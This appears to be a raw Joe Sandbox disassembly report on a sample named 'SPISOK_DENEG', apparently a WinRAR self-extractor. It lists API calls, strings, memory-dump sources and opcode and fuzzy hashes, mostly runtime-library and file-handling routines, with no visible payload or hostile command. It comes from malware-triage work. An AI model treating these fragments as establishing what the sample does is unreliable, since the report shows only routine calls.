                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                            • MoveFileW.KERNEL32(?,?), ref: 000D94D4
                                                            • MoveFileW.KERNEL32(?,?), ref: 000D9514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            • Opcode ID: 75821826767e8d05492720dd9ec643d1b5bf67fbb233076c5f1bf561800092b4
                                                            • Instruction ID: ebec20a3dd31919a00da0cffd0ab8cf4838cda6d7e8afaf8aa6af42f736693bc
                                                            • Opcode Fuzzy Hash: 75821826767e8d05492720dd9ec643d1b5bf67fbb233076c5f1bf561800092b4
                                                            • Instruction Fuzzy Hash: 134163719003596ADF61ABA0DC45EEE737CAF45340F0088A6B649E3256DB788BC9CB70
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 000E122E
                                                              • Part of subcall function 000DB146: GetVersionExW.KERNEL32(?), ref: 000DB16B
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 000E1251
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 000E1263
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 000E1274
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000E1284
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000E1294
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000E12CF
                                                            • __aullrem.LIBCMT ref: 000E1379
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            • Opcode ID: 26840ecba06d7f75d3f140732cb2fe0f0fbeee5cf34a73a7ee39cba353046168
                                                            • Instruction ID: 28613dea8f6ade8fea6c89d2c2dfc84ec7288fa9ea1f88589288eb5da637c575
                                                            • Opcode Fuzzy Hash: 26840ecba06d7f75d3f140732cb2fe0f0fbeee5cf34a73a7ee39cba353046168
                                                            • Instruction Fuzzy Hash: E441F5B1508345AFC710DF65C8849ABFBE9FB88314F00892EF5D6D2610E774E659CB62
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 000D2536
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                              • Part of subcall function 000E05DA: _wcslen.LIBCMT ref: 000E05E0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 3053425827-2277559157
                                                            • Opcode ID: da7e1b171758705cb18ff7ffc301dc409ee1e395c2b0a10fba7f4c1ac0e12c75
                                                            • Instruction ID: 97b11ffbd87efb9c4cc100cda7a1c06400d9d8e0b5cc4265355adc315ee40f33
                                                            • Opcode Fuzzy Hash: da7e1b171758705cb18ff7ffc301dc409ee1e395c2b0a10fba7f4c1ac0e12c75
                                                            • Instruction Fuzzy Hash: 90F1F5716083819BDB25EB248495BFE77DA6FA0300F08056FEE869B383DB749945C772
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: 517290c27309ea30c52bb4f286c51648532975031ccf20811b842b023bf8773c
                                                            • Instruction ID: 9c6a1604619791a92f04c0428ea7573f88fc7219bef2d9a698ea0010e83eade3
                                                            • Opcode Fuzzy Hash: 517290c27309ea30c52bb4f286c51648532975031ccf20811b842b023bf8773c
                                                            • Instruction Fuzzy Hash: 6A5137667043B29DDB709A279C117B673E0DFA1750F69052AFAC1AB2C0FBA58C818261
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,000FFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 000FF6CF
                                                            • __fassign.LIBCMT ref: 000FF74A
                                                            • __fassign.LIBCMT ref: 000FF765
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 000FF78B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,000FFE02,00000000,?,?,?,?,?,?,?,?,?,000FFE02,00000000), ref: 000FF7AA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,000FFE02,00000000,?,?,?,?,?,?,?,?,?,000FFE02,00000000), ref: 000FF7E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: e912f27a44c67226866fef795054033b4bfc960c4ea992729870df621b95512e
                                                            • Instruction ID: e3ce222b5dc5fb0e758336e33ab888cf06b75c0611c9ace5038e31929021e8bd
                                                            • Opcode Fuzzy Hash: e912f27a44c67226866fef795054033b4bfc960c4ea992729870df621b95512e
                                                            • Instruction Fuzzy Hash: 055165B1A0024A9FDB10CFA4DC45AFEFBF8EF09350F14416AE655E7651E770AA41CBA0
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 000F2937
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 000F293F
                                                            • _ValidateLocalCookies.LIBCMT ref: 000F29C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 000F29F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 000F2A48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: 72530a8d826358de3c09dad6a80dbbfa88258082f925f449b4e0be6817681131
                                                            • Instruction ID: ad61e9a4f2568e014aaaa8ca2163c96059d01c3f915a283549e6d6dc25a894dc
                                                            • Opcode Fuzzy Hash: 72530a8d826358de3c09dad6a80dbbfa88258082f925f449b4e0be6817681131
                                                            • Instruction Fuzzy Hash: 7741B330A0020CAFCF10DF69C885ABEBBF5AF44324F148055EA55AB792D7B1DA51DFA1
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 000E9EEE
                                                            • GetWindowRect.USER32(?,00000000), ref: 000E9F44
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 000E9FDB
                                                            • SetWindowTextW.USER32(?,00000000), ref: 000E9FE3
                                                            • ShowWindow.USER32(00000000,00000005), ref: 000E9FF9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            • Opcode ID: 3c0782315b756398bdc2e5292c44af9c4ac0fdb0dbf88538be979c373d474d71
                                                            • Instruction ID: 5ffcd800837135f499e2f9bbd73b583fe595ccf94682719d0b7538c00b5ddd99
                                                            • Opcode Fuzzy Hash: 3c0782315b756398bdc2e5292c44af9c4ac0fdb0dbf88538be979c373d474d71
                                                            • Instruction Fuzzy Hash: 7C412032104300EFCB209F66DC88B6BBBE8FF48311F004528F949AA152CB74EA44CB66
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            • Opcode ID: 22d735ad4dd65f8f1a949bd1dadb2039a1512dc7a69b39698a3e69c8e989e691
                                                            • Instruction ID: b7040a4f47cb0f63ca5a8fc195575edd20f6d37edfe2f11ed2250a921d586929
                                                            • Opcode Fuzzy Hash: 22d735ad4dd65f8f1a949bd1dadb2039a1512dc7a69b39698a3e69c8e989e691
                                                            • Instruction Fuzzy Hash: ED315E726443855ED630EB559C42BBB73E4EF50320F64442EF586672C1FBA1AD4083E2
                                                            APIs
                                                              • Part of subcall function 000FC868: _free.LIBCMT ref: 000FC891
                                                            • _free.LIBCMT ref: 000FC8F2
                                                              • Part of subcall function 000F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?), ref: 000F8DE2
                                                              • Part of subcall function 000F8DCC: GetLastError.KERNEL32(?,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?,?), ref: 000F8DF4
                                                            • _free.LIBCMT ref: 000FC8FD
                                                            • _free.LIBCMT ref: 000FC908
                                                            • _free.LIBCMT ref: 000FC95C
                                                            • _free.LIBCMT ref: 000FC967
                                                            • _free.LIBCMT ref: 000FC972
                                                            • _free.LIBCMT ref: 000FC97D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction ID: 0acb89a977855affc44493c602e3f9468d5692927c71a6af591799304748c9f6
                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction Fuzzy Hash: 5A110D71580B0CAAE620B7B1CD07FEB7BAC9F05B40F404C15B39D66893DE65A90AF750
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,000EE669,000EE5CC,000EE86D), ref: 000EE605
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 000EE61B
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 000EE630
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: be1267e578d73ed8d386488814294d695b0bb4e576bb76d13a85d407a11bc8e7
                                                            • Instruction ID: 90e8131bc84be03bd0c176322a32480a51e94ba2201aad3975b862c4729d9801
                                                            • Opcode Fuzzy Hash: be1267e578d73ed8d386488814294d695b0bb4e576bb76d13a85d407a11bc8e7
                                                            • Instruction Fuzzy Hash: 1CF0F6317826E66FCF714F67DC8456B22DD6B257C13000839E945F3550EB90CC945B90
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000E14C2
                                                              • Part of subcall function 000DB146: GetVersionExW.KERNEL32(?), ref: 000DB16B
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000E14E6
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 000E1500
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 000E1513
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000E1523
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000E1533
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: ad0b2f8377354467a864c81ed0837e6107e736ffb416358ccdb6dea3921c7679
                                                            • Instruction ID: b53d9ebd8a0e909bfe5a9677aab7dba7bfcabc995d4949cf14dc0aa6d6ebb5d8
                                                            • Opcode Fuzzy Hash: ad0b2f8377354467a864c81ed0837e6107e736ffb416358ccdb6dea3921c7679
                                                            • Instruction Fuzzy Hash: 2331F776208345AFC700DFA9C88499BB7E8BF9C714F004A1EF995C3610E770D549CBA6
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,000F2AF1,000F02FC,000EFA34), ref: 000F2B08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000F2B16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000F2B2F
                                                            • SetLastError.KERNEL32(00000000,000F2AF1,000F02FC,000EFA34), ref: 000F2B81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: ed6d2c45d23ba00345c6c9588aca2f52bf4d53f82763a2eb26712f1a6bc10122
                                                            • Instruction ID: 4ad2c70da32495684357f9a9fe1e222cdbe461eda6c25a7fa49672dd0a30bc53
                                                            • Opcode Fuzzy Hash: ed6d2c45d23ba00345c6c9588aca2f52bf4d53f82763a2eb26712f1a6bc10122
                                                            • Instruction Fuzzy Hash: FD01B13220D3196EE6642A757C859BA3BE9EF41774F600A39FB6055CE1EF924C40B284
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00111030,000F4674,00111030,?,?,000F3F73,00000050,?,00111030,00000200), ref: 000F97E9
                                                            • _free.LIBCMT ref: 000F981C
                                                            • _free.LIBCMT ref: 000F9844
                                                            • SetLastError.KERNEL32(00000000,?,00111030,00000200), ref: 000F9851
                                                            • SetLastError.KERNEL32(00000000,?,00111030,00000200), ref: 000F985D
                                                            • _abort.LIBCMT ref: 000F9863
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 97e3dd9e2eb7700a44c71252a777e4d39edf127f3d4743cce8b2d8fe09ec20c4
                                                            • Instruction ID: c3d7861cbe356e9f02fb420d2f9b0a78c62043a4a22cf0ac5ddec1bc1aed7703
                                                            • Opcode Fuzzy Hash: 97e3dd9e2eb7700a44c71252a777e4d39edf127f3d4743cce8b2d8fe09ec20c4
                                                            • Instruction Fuzzy Hash: D9F0A43614060966C7523325BC0ABBB2AA99FD3BB1F290124F76892D93EE608847B565
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 000EDC47
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000EDC61
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000EDC72
                                                            • TranslateMessage.USER32(?), ref: 000EDC7C
                                                            • DispatchMessageW.USER32(?), ref: 000EDC86
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 000EDC91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            • Opcode ID: 7279584f758d687264ffac1e1a165a1d34ca3ec78e43d0b4b59305623c608310
                                                            • Instruction ID: 4645fc93fea4e56724d14b84032c867c6a0f376f4a17bebe4a9f80c6063a1d54
                                                            • Opcode Fuzzy Hash: 7279584f758d687264ffac1e1a165a1d34ca3ec78e43d0b4b59305623c608310
                                                            • Instruction Fuzzy Hash: 61F06272A01219BBCB206BA5EC4CDCF7FBDEF41791B104011F51AE2064D675D686C7B0
                                                            APIs
                                                              • Part of subcall function 000E05DA: _wcslen.LIBCMT ref: 000E05E0
                                                              • Part of subcall function 000DB92D: _wcsrchr.LIBVCRUNTIME ref: 000DB944
                                                            • _wcslen.LIBCMT ref: 000DC197
                                                            • _wcslen.LIBCMT ref: 000DC1DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            • Opcode ID: 95796a0c5b5ceb9696f3c9832f5b7c6c17ce1dedf2808efc202e0937c5279e05
                                                            • Instruction ID: 3139e94e9980233f5fa14852b337807074fab1cff00da0d84a2004b1f7f3efd5
                                                            • Opcode Fuzzy Hash: 95796a0c5b5ceb9696f3c9832f5b7c6c17ce1dedf2808efc202e0937c5279e05
                                                            • Instruction Fuzzy Hash: 3841182654036299E771AF748852EBBB7E8EF42754F14050FF9D16B2C2EBA04D81C3B5
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 000ECE9D
                                                              • Part of subcall function 000DB690: _wcslen.LIBCMT ref: 000DB696
                                                            • _swprintf.LIBCMT ref: 000ECED1
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                            • SetDlgItemTextW.USER32(?,00000066,0011946A), ref: 000ECEF1
                                                            • EndDialog.USER32(?,00000001), ref: 000ECFFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
